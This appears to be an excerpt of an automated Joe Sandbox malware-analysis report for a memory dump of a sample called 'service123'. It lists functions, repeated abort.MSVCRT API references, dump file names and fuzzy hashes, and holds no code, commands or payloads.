abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: aef418c54e611c5a30df6eda45a129d4c5881a8d4d58c4fa0cc5f3333ece63ee
Instruction ID: 1515ea51aa7de64d797578e36076f533a72d59f3c8cd62da9a16bf531d99422c
Opcode Fuzzy Hash: aef418c54e611c5a30df6eda45a129d4c5881a8d4d58c4fa0cc5f3333ece63ee
Instruction Fuzzy Hash: 7901D6B2502601CBE704EF6DD491B55B7B0FB22309F019A48D185DBB11D739E858CF90

Function 6C9D28BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 173fdc44e26c4570e776394247bb449b508401b47ca0934840c71bd07a18aee1
Instruction ID: 46d787bf2b1cb5bcbe52eae3781b75322d2e64a776a891b7414c7963ff9111d8
Opcode Fuzzy Hash: 173fdc44e26c4570e776394247bb449b508401b47ca0934840c71bd07a18aee1
Instruction Fuzzy Hash: C60114B2542601CBE708EF5DD491B6AB7B0FF22309F029A48C585ABB01C735E859CF90

Function 6C9D2A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d28efec74ff89fc89b917a6ebf20a028ff5802fd8d7933b4c366f8583c81ad5d
Instruction ID: e14cac554959ba69aefa71e731dd1b31cb5f03d78d0c52271670631d7510c997
Opcode Fuzzy Hash: d28efec74ff89fc89b917a6ebf20a028ff5802fd8d7933b4c366f8583c81ad5d
Instruction Fuzzy Hash: DA0137B2502601CBE704EF59D491B6AB7B0FF22308F029A48C094ABB01C735E85CCF90

Function 6C9D2B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: e58c7c38ac36b0cfb87eca1e96a997d91dbe5ebafb56a8cb4864cec38680dc6d
Instruction ID: 3f68bf32f6c5c097400df1af4cb27d06241b126fe9d4a89eb515b38306fec871
Opcode Fuzzy Hash: e58c7c38ac36b0cfb87eca1e96a997d91dbe5ebafb56a8cb4864cec38680dc6d
Instruction Fuzzy Hash: 0BF037B2505601CBD704EF59D491B66B7B0FF22308F029A48C095ABB01C735E468CF90

Function 6C9D29B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: d41486b22b9e66beabf9a389eb057c4459f50c16fdbe8d30a892cb62550615e4
Instruction ID: de20f82955f37e69c12b92fafe5d87b73d5a7108b873f1a4a8f2fd2f252bfbf7
Opcode Fuzzy Hash: d41486b22b9e66beabf9a389eb057c4459f50c16fdbe8d30a892cb62550615e4
Instruction Fuzzy Hash: F2F044B2501601CBD704EF58D095BAAB7B0FF2230CF029A48C044ABB06C735E469CF80

Function 6C9D2AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CAA6CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7a0f1bb4fd7cef361d3e165442df9e55082f3c71a328f553fb25d5e12f807ed3
Instruction ID: 0e1387fa6564fb0d63832a280b9db66a8b8e86f635eac5fbd523aa7e27327824
Opcode Fuzzy Hash: 7a0f1bb4fd7cef361d3e165442df9e55082f3c71a328f553fb25d5e12f807ed3
Instruction Fuzzy Hash: 7CF03AB1545611CBD705EF59D0907AAF770FF22308F029A48C455ABF06DB31E469CF90

Function 6C9DB930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C9DC5DB), ref: 6CAA6D44
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D4C
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D51
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D56
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D5B
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D60
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D65
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6A
abort.MSVCRT(?,?,?,?,?,?,6C9DE2F4,?,?,?,?,?,?,00000000,00000001,6C9E008D), ref: 6CAA6D6F
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D74
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D79
abort.MSVCRT(?,?,00000000,00000000,?,774CE010,6C9E038F), ref: 6CAA6D7E

Memory Dump Source

Source File: 00000005.00000002.2565772802.000000006C9D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9D0000, based on PE: true

Associated: 00000005.00000002.2565757653.000000006C9D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565852462.000000006CAAD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565870823.000000006CAAF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565903561.000000006CAF8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565919693.000000006CAF9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2565937026.000000006CAFC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c9d0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 3d35db0dbe91345c3334dad491edc108d0c0bd5bb93bc2b91795f8094d3861e4
Instruction ID: 85d35037784a99310f210884c5df7bc3780a2c1f8318f8bb901898131ed80507
Opcode Fuzzy Hash: 3d35db0dbe91345c3334dad491edc108d0c0bd5bb93bc2b91795f8094d3861e4
Instruction Fuzzy Hash: E2312330249F489FC7008E99C4D1396B3F5EF89358F41C92ADA99A7B42D334F854DB91

Function 6C9DBFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

